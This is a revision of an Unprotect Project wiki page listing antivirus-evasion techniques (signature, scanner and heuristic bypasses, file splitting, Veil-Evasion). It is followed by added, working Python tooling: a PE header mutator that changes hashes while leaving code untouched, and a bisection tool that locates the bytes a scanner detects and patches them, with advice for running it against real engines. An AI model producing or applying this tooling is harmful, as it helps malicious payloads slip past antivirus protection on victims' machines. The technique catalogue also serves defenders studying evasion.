Antivirus Evasion

From Unprotect Project
Revision as of 16:57, 3 November 2016 by Admin (talk | contribs) (Technics)


Technic Description

Anti-virus evasion covers the techniques used by malware to avoid detection by anti-virus software. The same techniques are used by malware writers, penetration testers and vulnerability researchers to bypass one or more antivirus products, so that the payload the attacker wants to execute on the target machine(s) is not blocked and can carry out the intended actions.

Technics

Below is a list of all the AV evasion technics in Unprotect Project:

Anti-Virus Evasion Technics

Evading signature
    Hash calculation: AV engines recognise a known sample by computing the file hash and comparing it with a list of known-bad hashes. Changing a single bit anywhere in the binary changes the hash and lets the sample evade hash-based detection (this defeats exact-match hashes only, not similarity hashes).
    Evading specific signature: Some signatures are written to catch one exploit or one specific behaviour. By reversing the signature, the sample can be modified so that it no longer matches, for example by changing the size of the matched payload or by changing the file header.
    PE format tricks: Signatures can also be evaded by modifying the PE structure: section names, TimeDateStamp, MajorLinkerVersion/MinorLinkerVersion, MajorOperatingSystemVersion/MinorOperatingSystemVersion, MajorImageVersion/MinorImageVersion, AddressOfEntryPoint, the number of sections, and the file length.

Evading scanner
    Fingerprinting emulator: Fingerprinting the AV emulator lets the sample detect that it is being emulated. For example, an emulator may create a specific mutex; checking for that mutex lets the sample recognise the AV and change its behaviour.
    Big file: Scanners impose a file size limit, so a file padded to exceed the hard-coded limit is skipped. This applies especially to heuristic engines that work on static data (data extracted from the portable executable, or PE, header).
    Loading critical library for the OS: Load a library that is critical to the operating system but not supported by the emulator, then call one of its exported functions. In almost any emulator the load fails, which reveals the emulated environment.
    File format confusion: Confusing the file format is another trick that can bypass a detection written for one specific file format.

Evading heuristic
    Bypassing static heuristic: A static heuristic engine inspects the PE structure and the file content to decide whether the file is malicious. Once its rules are understood, such an engine can be fooled. For example, a heuristic may flag a file with a double extension (e.g. invoice.doc.exe) as malicious.
    Bypassing dynamic heuristic: Dynamic heuristic engines are implemented as hooks (in user-land or kernel-land) or are based on emulation. User-land hooks (HIPS) can be bypassed by restoring the original bytes at the entry point of the hooked function. Kernel-land hooks require the malware to run in kernel space, by installing a driver or by exploiting a kernel-level vulnerability.

File splitting: An old trick is to split the malicious file into several parts and scan each part separately with the AV. The chunk that still triggers detection is the part of the file that must be changed to evade the targeted antivirus software.

Veil-Evasion: Veil-Evasion is not a technic in itself but an open source framework designed to evade AV by combining several of the techniques above, such as encryption, encoding, Hyperion and others.
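The "PE format tricks", "Hash calculation" and "Big file" entries above in working form, as an added example that is not code from the Unprotect Project. The parser below is a deliberately minimal one written for this page (not pefile): it follows e_lfanew to the COFF and optional headers and rewrites the fields the list names, then pads the overlay. The PE it operates on is constructed inline as a fixture, and the replacement field values are arbitrary choices.

```python
import hashlib
import struct

SECTION_HDR = "<8sIIIIIIHHI"   # IMAGE_SECTION_HEADER, 40 bytes


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 fixture (headers + one .text section); a
    layout for the parser below, not a binary taken from the page."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0x58000000, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    # Magic, linker 14.0, SizeOfCode, init/uninit data, AddressOfEntryPoint
    struct.pack_into("<HBBIIII", opt, 0, 0x10B, 14, 0, 0x200, 0, 0, 0x1000)
    # BaseOfCode, BaseOfData, ImageBase, SectionAlignment, FileAlignment
    struct.pack_into("<IIIII", opt, 20, 0x1000, 0x2000, 0x400000, 0x1000, 0x200)
    # OS version 6.0, image version 0.0, subsystem version 6.0
    struct.pack_into("<HHHHHH", opt, 40, 6, 0, 0, 0, 6, 0)
    # SizeOfImage, SizeOfHeaders, CheckSum, Subsystem (CUI), DllCharacteristics
    struct.pack_into("<IIIHH", opt, 56, 0x2000, 0x200, 0, 3, 0)
    sec = struct.pack(SECTION_HDR, b".text", 0x10, 0x1000, 0x200, 0x200,
                      0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sec).ljust(0x200, b"\0")
    text = b"\x31\xc0\xc3".ljust(0x200, b"\xcc")          # xor eax,eax ; ret
    return headers + text


class PEHeaders:
    def __init__(self, data: bytes):
        self.data = bytearray(data)
        if self.data[:2] != b"MZ":
            raise ValueError("missing MZ signature")
        e_lfanew, = struct.unpack_from("<I", self.data, 0x3C)
        if self.data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
            raise ValueError("missing PE signature")
        self.coff = e_lfanew + 4                      # IMAGE_FILE_HEADER
        self.nsections, = struct.unpack_from("<H", self.data, self.coff + 2)
        opt_size, = struct.unpack_from("<H", self.data, self.coff + 16)
        self.opt = self.coff + 20                     # IMAGE_OPTIONAL_HEADER
        self.sections = self.opt + opt_size           # first IMAGE_SECTION_HEADER

    def timestamp(self) -> int:
        return struct.unpack_from("<I", self.data, self.coff + 4)[0]

    def set_timestamp(self, ts: int) -> None:
        struct.pack_into("<I", self.data, self.coff + 4, ts)

    def set_linker_version(self, major: int, minor: int) -> None:
        struct.pack_into("<BB", self.data, self.opt + 2, major, minor)

    def set_os_version(self, major: int, minor: int) -> None:
        struct.pack_into("<HH", self.data, self.opt + 40, major, minor)

    def set_image_version(self, major: int, minor: int) -> None:
        struct.pack_into("<HH", self.data, self.opt + 44, major, minor)

    def section_name(self, index: int) -> bytes:
        return struct.unpack_from("<8s", self.data, self.sections + 40 * index)[0].rstrip(b"\0")

    def rename_section(self, index: int, name: bytes) -> None:
        if index >= self.nsections:
            raise IndexError("no such section")
        struct.pack_into("<8s", self.data, self.sections + 40 * index, name[:8])

    def append_overlay(self, size: int) -> None:
        # "Big file" trick: the overlay is never mapped by the loader, so
        # padding it past the scanner's size limit changes nothing at run time.
        self.data += b"\0" * size

    def entry_bytes(self, n: int = 8) -> bytes:
        """Raw bytes at AddressOfEntryPoint, to prove the code is untouched."""
        rva, = struct.unpack_from("<I", self.data, self.opt + 16)
        for i in range(self.nsections):
            off = self.sections + 40 * i
            vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", self.data, off + 8)
            if va <= rva < va + max(vsize, rawsize):
                start = rawptr + (rva - va)
                return bytes(self.data[start:start + n])
        raise ValueError("entry point outside every section")


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def mutate(data: bytes, overlay_bytes: int = 0) -> bytes:
    """Apply the cosmetic header edits; the new values are arbitrary choices."""
    pe = PEHeaders(data)
    pe.set_timestamp(0x5A000000)
    pe.set_linker_version(10, 0)
    pe.set_os_version(5, 1)
    pe.set_image_version(1, 0)
    pe.rename_section(0, b".code")
    if overlay_bytes:
        pe.append_overlay(overlay_bytes)
    return bytes(pe.data)
```

Run mutate() over a real sample and compare sha256() before and after: the hash differs while entry_bytes() is identical, which is the whole point of the trick. AddressOfEntryPoint is deliberately left alone here, since changing it means relocating or adding code rather than editing a header field. Two caveats: header edits invalidate the optional-header CheckSum when one is set (the loader ignores it for ordinary user-mode executables but not for drivers), and section names or version fields that look unusual are themselves a static-heuristic signal, so pick values that match a common compiler.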

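An automated version of the file-splitting procedure above, added here as an example and not tooling from the Unprotect Project. The scanner is a constructed stand-in with two made-up signatures; against a real engine you would replace scan() with a call to its command-line scanner and read the verdict from the exit code. Rather than cutting the file into pieces, which some scanners refuse to inspect because the format is no longer valid, the search blanks out everything outside a candidate window and bisects, generalising the manual split-and-rescan into a search that returns the exact byte range to change.

```python
from typing import Callable, Optional, Tuple

# Constructed signatures standing in for an AV database (not real ones).
SIGNATURES = {
    "Demo.Dropper.A": b"DEMO_PAYLOAD_MARKER",
    "Demo.Stager.B": b"\x90\x90\x90\x90\xcc\xcc\xcc\xcc",
}

Verdict = Optional[str]
Scanner = Callable[[bytes], Verdict]


def scan(data: bytes) -> Verdict:
    """Stand-in scanner: name of the first signature found in the buffer."""
    for name, pattern in SIGNATURES.items():
        if pattern in data:
            return name
    return None


def _masked(data: bytes, start: int, end: int, fill: bytes) -> bytes:
    """Keep data[start:end] in place, overwrite everything else with `fill`."""
    return fill * start + data[start:end] + fill * (len(data) - end)


def locate_detection(data: bytes, scanner: Scanner = scan,
                     fill: bytes = b"\0") -> Optional[Tuple[str, int, int]]:
    """Return (verdict, start, end) of the smallest window that still
    triggers `scanner`, or None when the file is clean.

    Assumes the verdict depends only on bytes inside the window and that the
    signature does not begin or end with the fill byte; choose another fill
    if it does, or the window will be reported too small."""
    verdict = scanner(data)
    if verdict is None:
        return None
    n = len(data)
    # Smallest `end` such that data[0:end] (rest blanked) still triggers.
    lo, hi = 0, n            # invariant: hi triggers, lo does not
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if scanner(_masked(data, 0, mid, fill)) == verdict:
            hi = mid
        else:
            lo = mid
    end = hi
    # Largest `start` such that data[start:end] (rest blanked) still triggers.
    lo, hi = 0, end          # invariant: lo triggers, hi does not
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if scanner(_masked(data, mid, end, fill)) == verdict:
            lo = mid
        else:
            hi = mid
    return verdict, lo, end


def build_sample_file() -> bytes:
    """Constructed test file: filler with one signature embedded at offset 202."""
    return b"MZ" + b"A" * 200 + SIGNATURES["Demo.Dropper.A"] + b"B" * 300


def evade(data: bytes, scanner: Scanner = scan) -> bytes:
    """Flip one byte in the middle of the located window. Against a real
    engine you would edit that region deliberately (re-encode it, change the
    string) rather than corrupt it blindly, since the byte may be code."""
    hit = locate_detection(data, scanner)
    if hit is None:
        return data
    _, start, end = hit
    patched = bytearray(data)
    patched[(start + end) // 2] ^= 0xFF
    return bytes(patched)
```

Each bisection step costs one scan, so a file is located in about 2*log2(size) scans instead of one scan per chunk per round. When a signature needs context the scanner will not see in a blanked file (an import table entry plus a string, for instance), the two searches return a window that no longer triggers on its own; that is the signal to fall back to the manual chunking the entry describes and inspect the surviving pieces by hand.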